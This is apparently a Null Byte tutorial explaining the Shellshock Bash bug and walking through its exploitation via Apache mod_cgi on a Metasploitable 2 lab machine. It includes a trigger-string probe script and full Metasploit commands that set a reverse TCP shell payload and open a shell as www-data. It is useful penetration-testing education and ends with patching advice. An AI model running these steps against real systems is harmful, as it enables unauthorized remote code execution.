One of the most critical bugs of the last five years was Shellshock (CVE-2014-6271), a vulnerability in the GNU Bash shell that lets an attacker execute arbitrary code, and in many common configurations do so remotely. It has been public for years, but given how many Unix machines are connected to the web, Shellshock is still a very real threat, especially for unpatched systems.
How the Shellshock Vulnerability Works
Shellshock first appeared back in September 2014. There were reports of attacks within hours of the initial disclosure of the vulnerability, and over the next few days, there were millions of attacks and probes coming from botnets.
Bash is a shell, or command interpreter, that runs commands on a system, typically from a terminal. It is usually the default shell on Unix-like systems, so it is found on Linux, macOS, and various other Unix flavors. This is why Shellshock is so severe: a majority of the web servers on the internet run Unix-like operating systems, not to mention a myriad of IoT devices and even some routers.
Essentially, Shellshock abuses the way Bash passes functions from a parent process to a child through the environment: a variable whose value starts with "() {" is treated as a function definition and imported when the new shell starts. Vulnerable versions kept parsing past the closing brace and executed whatever followed, so an attacker who controls any environment variable can append commands to a function definition and have them run the moment Bash starts, before the script it was asked to run. This is a code injection bug, and since the trailing text is ordinary shell code, pretty much any command can be executed.
Shellshock is actually a family of vulnerabilities (CVE-2014-6271 plus follow-ups such as CVE-2014-6278, found when the first patch proved incomplete) reachable through multiple attack vectors: anything that lets an attacker populate an environment variable before Bash starts. In this guide, we will be exploiting the CGI script attack vector, specifically scripts served by the mod_cgi module that is part of the Apache HTTP Server.
How Apache & CGI Play into This
Apache is a cross-platform open-source web server developed by the Apache Software Foundation. It is robust with features such as virtual hosting, authentication schemes, SSL and TLS, custom error messages, and multiple programming language support. Apache also has a module called mod_cgi which handles the execution of Common Gateway Interface (CGI) scripts.
CGI (RFC 3875) is an interface that lets a web server run external programs and return their output as the HTTP response. These programs, known as CGI scripts, typically generate dynamic pages from request data. A dedicated directory, usually named cgi-bin or something similar, is configured as a script alias so that a request for a file inside it executes the file instead of serving it; whatever the script writes to standard output is passed back to the browser.
When a CGI script runs, the server copies the details of the request into environment variables: the method, the query string, and every client-supplied header, each renamed with an HTTP_ prefix (User-Agent becomes HTTP_USER_AGENT). If the script is a Bash script, or anything it runs starts Bash, those attacker-controlled values reach Bash's environment parser, which is all Shellshock needs. Conveniently, the Rapid7 team developed a Metasploit module that makes exploiting this vector very easy.
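To see that path end to end without a web server, here is an added example (not code from the article or from Metasploit) that does by hand what mod_cgi does: it maps a request header to its CGI variable name, writes the walkthrough's hello.sh to a temporary directory, and starts it under Bash with the malicious User-Agent in the environment. BASH_BIN, the temporary directory and the SHELLSHOCK_MARKER string are assumptions of the example.

```shell
#!/bin/sh
# Added example, not code from the original article: reproduce locally what
# happens when Apache's mod_cgi copies a request header into the environment
# and a Bash CGI script is started with it. BASH_BIN is an assumption; point
# it at the Bash binary you want to test (the system bash by default).
BASH_BIN="${BASH_BIN:-bash}"

# CGI (RFC 3875) maps a request header to an environment variable by
# upper-casing it, turning '-' into '_' and prefixing HTTP_.
cgi_env_name() {
    printf 'HTTP_%s\n' "$1" | tr 'a-z' 'A-Z' | sed 's/-/_/g'
}

# Write the article's hello.sh to a temp dir and start it the way mod_cgi
# does: a fresh environment containing the mapped request headers. Prints the
# script's output.
run_cgi_with_user_agent() {
    bash_path=$(command -v "$BASH_BIN") || return 1
    dir=$(mktemp -d) || return 1
    cat >"$dir/hello.sh" <<'EOF'
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
EOF
    chmod 755 "$dir/hello.sh"
    env -i PATH=/usr/local/bin:/usr/bin:/bin \
        "$(cgi_env_name User-Agent)=$1" \
        "$bash_path" "$dir/hello.sh" 2>/dev/null
    rc=$?
    rm -rf "$dir"
    return $rc
}

# Send the classic CVE-2014-6271 trigger as the User-Agent: an empty function
# body followed by an extra command. A vulnerable Bash imports the "function"
# and runs the trailing command at startup, before hello.sh's first line, so
# the marker shows up ahead of the Content-type header. A fully patched Bash
# only imports functions from BASH_FUNC_name%% variables and ignores the rest.
# Prints vulnerable, patched or no-bash.
probe_local_cgi() {
    command -v "$BASH_BIN" >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(run_cgi_with_user_agent '() { :;}; echo SHELLSHOCK_MARKER')
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *)                   echo patched ;;
    esac
}

# Usage: run_cgi_with_user_agent 'Mozilla/5.0' prints the normal page;
#        probe_local_cgi reports whether this host's Bash is affected.
```

On a fully patched Bash the marker never appears and the script prints its normal page; on a Bash from before the September 2014 fixes the marker is printed before the Content-type line, which is exactly the malformed-header situation that real-world exploits work around by emitting a blank line first.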
What You Need for This Walkthrough
Metasploitable 2 is an excellent virtual machine full of vulnerabilities to practice your hacking skills on. I will be attacking that on an isolated network with the faithful Kali Linux. You may want to do the same to make sure you get the same results when first trying this out; then you can move on to pentesting real machines.
Step 1: Configure Target
For this exploit to work, there has to be an executable Bash CGI script reachable under the /cgi-bin/ URL path. On Metasploitable 2, Apache maps that path to /usr/lib/cgi-bin, and a simple "Hello world!" script is enough for demonstration purposes. Navigate to /usr/lib/cgi-bin on the target machine, and type the following command:
sudo nano hello.sh
Enter the correct password, then make the file look like this:
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
Press Ctrl-X, followed by Y, and Enter to save. The script must be executable by Apache's own user (www-data), not just by you, so set its mode with the chmod command:
sudo chmod 755 hello.sh
We can verify this is working correctly by browsing to http://<target IP>/cgi-bin/hello.sh (172.16.1.102 in this lab), which should return the text Hello world!. If Apache answers with a 500 error instead, check the execute bit and the header lines: a CGI script must print at least one header followed by a blank line before its body, or mod_cgi rejects the output as malformed.
Step 2: Prepare Exploit
On the Kali machine, fire up Metasploit by typing msfconsole in the terminal. We're greeted with a random banner and Metasploit's command prompt:
root@kali:~# msfconsole
=[ metasploit v4.17.3-dev- ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
We can easily search for exploits by using the search command. Type search shellshock, locate the apache_mod_cgi_bash_env_exec module, and note its full path:
msf > search shellshock
[!] Module database cache not built yet, using slow search
Matching Modules
================

Name                                               Disclosure Date  Rank       Description
----                                               ---------------  ----       -----------
auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
auxiliary/server/dhclient_bash_env                 2014-09-24       normal     DHCP Client Bash Environment Variable Code Injection (Shellshock)
exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Advantech Switch Bash Environment Variable Code Injection (Shellshock)
exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  IPFire Bash Environment Variable Injection (Shellshock)
exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  CUPS Filter Bash Environment Variable Code Injection (Shellshock)
exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  Dhclient Bash Environment Variable Injection (Shellshock)
exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     Qmail SMTP Bash Environment Variable Injection (Shellshock)
msf >
Load this exploit by typing use followed by the module path we just noted. The prompt grows to show which module is currently loaded:
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Type options to see the various settings for this module:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

Name            Current Setting    Required  Description
----            ---------------    --------  -----------
CMD_MAX_LENGTH  2048               yes       CMD max line length
CVE             CVE-2014-6271      yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER          User-Agent         yes       HTTP header to use
METHOD          GET                yes       HTTP method to use
Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST                              yes       The target address
RPATH           /bin               yes       Target PATH for binaries used by the CmdStager
RPORT           80                 yes       The target port (TCP)
SRVHOST         0.0.0.0            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT         8080               yes       The local port to listen on.
SSL             false              no        Negotiate SSL/TLS for outgoing connections
SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI                          yes       Path to CGI script
TIMEOUT         5                  yes       HTTP read response timeout (seconds)
URIPATH                            no        The URI to use for this exploit (default is random)
VHOST                              no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Linux x86
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
We can leave most of the defaults, but we need to set the remote host to the IP address of the target and the target URI to the path of the script we placed in the cgi-bin directory (newer Metasploit releases name the host option RHOSTS rather than RHOST; use whichever name options shows), like so:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/hello.sh
targeturi => /cgi-bin/hello.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Next, we need to choose a payload. Type show payloads to view different payloads and information regarding each of them:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads
Compatible Payloads
===================

Name                                      Disclosure Date  Rank       Description
----                                      ---------------  ----       -----------
generic/custom                                             normal     Custom Payload
generic/debug_trap                                         normal     Generic x86 Debug Trap
generic/shell_bind_tcp                                     normal     Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                                  normal     Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                         normal     Generic x86 Tight Loop
linux/x86/chmod                                            normal     Linux Chmod
linux/x86/exec                                             normal     Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp                        normal     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp                        normal     Linux Mettle x86, Bind TCP Stager
linux/x86/meterpreter/bind_tcp                             normal     Linux Mettle x86, Bind TCP Stager (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid                        normal     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/reverse_ipv6_tcp                     normal     Linux Mettle x86, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp                     normal     Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp                          normal     Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp_uuid                     normal     Linux Mettle x86, Reverse TCP Stager
linux/x86/metsvc_bind_tcp                                  normal     Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp                               normal     Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file                                        normal     Linux Read File
linux/x86/shell/bind_ipv6_tcp                              normal     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid                         normal     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp                              normal     Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp                                   normal     Linux Command Shell, Bind TCP Stager (Linux x86)
linux/x86/shell/bind_tcp_uuid                              normal     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/shell/reverse_ipv6_tcp                           normal     Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp                           normal     Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp                                normal     Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp_uuid                           normal     Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp                              normal     Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp                                   normal     Linux Command Shell, Bind TCP Inline
linux/x86/shell_bind_tcp_random_port                       normal     Linux Command Shell, Bind TCP Random Port Inline
linux/x86/shell_reverse_tcp                                normal     Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp_ipv6                           normal     Linux Command Shell, Reverse TCP Inline (IPv6)
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
A staged reverse TCP shell will suffice here: the exploit pushes a small stager onto the target through the CGI request, and the stager connects back to our handler on LHOST:LPORT to fetch the rest of the payload, which works even when the target's firewall blocks inbound connections. Type set payload linux/x86/shell/reverse_tcp to select it.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
Type options again and we can see the current settings for this module including payload information:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

Name            Current Setting    Required  Description
----            ---------------    --------  -----------
CMD_MAX_LENGTH  2048               yes       CMD max line length
CVE             CVE-2014-6271      yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER          User-Agent         yes       HTTP header to use
METHOD          GET                yes       HTTP method to use
Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST           172.16.1.102       yes       The target address
RPATH           /bin               yes       Target PATH for binaries used by the CmdStager
RPORT           80                 yes       The target port (TCP)
SRVHOST         0.0.0.0            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT         8080               yes       The local port to listen on.
SSL             false              no        Negotiate SSL/TLS for outgoing connections
SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI       /cgi-bin/hello.sh  yes       Path to CGI script
TIMEOUT         5                  yes       HTTP read response timeout (seconds)
URIPATH                            no        The URI to use for this exploit (default is random)
VHOST                              no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Linux x86
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Step 3: Get Shell
Many Metasploit modules implement a check method that tests whether the target is vulnerable without actually exploiting it. Type check, and if the module supports it, a verdict on the target is displayed:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[*] 172.16.1.102:80 The target is vulnerable.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
We can see that the target is indeed vulnerable, so use the exploit command to launch the attack. A shell session opens (it has no prompt, so just type), and we can run commands like id and whoami to see who we are. The shell runs as www-data, Apache's unprivileged user, which is all a CGI script ever gets:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
How to Protect Yourself from Shellshock Vulnerabilities
The answer is simple: patch your system. Every maintained distribution shipped fixed Bash packages within days of the disclosure, and the final round of patches changed how Bash imports functions from the environment so that an arbitrary variable such as HTTP_USER_AGENT can no longer carry one. Do not take the patch on faith: confirm it the same way an attacker would, by pointing the module's check at your own CGI endpoints or by feeding the public test string to the Bash binary on each host. Keep in mind that the vector is any program that starts Bash with attacker-controlled environment variables, so a CGI script written in Perl or PHP that shells out is just as exposed on a system where that shell is Bash. This vulnerability has been out for years and patches exist for practically every system, so if yours is still unpatched, you have no one to blame but yourself.
Stay Tuned for Escalating Privs
So far, we have learned how Shellshock works and how the CGI vector exposes it, used a Metasploit module to exploit the vulnerability, and gained a shell on our target system. That shell runs as www-data without a terminal, so there is only so much we can do with it. In the next article, we will use a kernel exploit to escalate privileges and get root.
Cover image by Tumisu/Pixabay; Screenshots by drd_/Null Byte